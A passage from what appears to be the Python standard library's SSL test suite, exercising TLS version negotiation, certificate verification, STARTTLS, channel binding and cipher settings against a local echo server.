'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(
ssl.SSLError,
'alert unknown ca|EOF occurred'
):
# TLS 1.3 perform client cert exchange after handshake
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
